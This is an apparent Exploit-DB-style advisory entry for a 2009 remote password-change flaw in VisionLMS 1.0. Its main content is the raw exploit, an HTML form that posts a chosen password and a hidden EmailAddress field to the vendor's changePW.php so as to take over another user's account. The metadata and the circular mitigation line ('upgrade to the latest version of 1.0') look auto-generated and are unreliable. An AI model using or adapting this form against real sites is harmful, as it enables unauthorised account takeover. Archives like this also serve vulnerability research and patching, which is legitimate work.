VisionLMS 1.0 | Change Password

vendor:

VisionLMS

by:

Mr.tro0oqy

9,3

CVSS

HIGH

Remote Password Change

CWE

Product Name: VisionLMS

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:visionlms:visionlms:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

VisionLMS 1.0 | Change Password

A vulnerability in VisionLMS 1.0 allows an attacker to remotely change the password of any user. The vulnerability is due to insufficient validation of user-supplied input in the 'Password' parameter of the 'changePW.php' script. An attacker can exploit this vulnerability by sending a malicious request to the vulnerable script. Successful exploitation will result in the attacker being able to change the password of any user.

Mitigation:

Upgrade to the latest version of VisionLMS 1.0

Source

Exploit-DB raw data:

<html>
<head>
<title>VisionLMS 1.0 | Change Password</title>



  <p>* VisionLMS 1.0 Remote Password Change<br>
  * Coded by Mr.tro0oqy<br>
  * E-mail t.4@windowslive.com ---&lt; Yemeni hacker<br>
  * Greetz All my Friends<br>
&nbsp;</p>



  <form enctype="multipart/form-data" method="post" name="form" action="http://visionlms.com/demo/changePW.php">
  <div style="font-weight:bold; color:#CC3300; padding:15;"></div>
   
  <div style="float:left; padding-left:15px; clear:both;"><input type="password" name="Password" value="" /></div>
  <div style="float:left; padding-left:20px;">
  <input type="hidden" name="EmailAddress" value="support@visionlms.com" />
  <input type="submit" name="submit" value="Change Password" onclick="return validateForm()" />
  </div>
  </form>
  </div> <!--END Activity DIV-->

 </div> <!--END Body DIV-->
  

 <!--START FOOTER NAVIGATION-->
 <!--<div id="Footer" class='Footer'>kjkjkj</div>-->
 <!--END FOOTER NAVIGATION-->








</body>
</html>

# milw0rm.com [2009-04-28]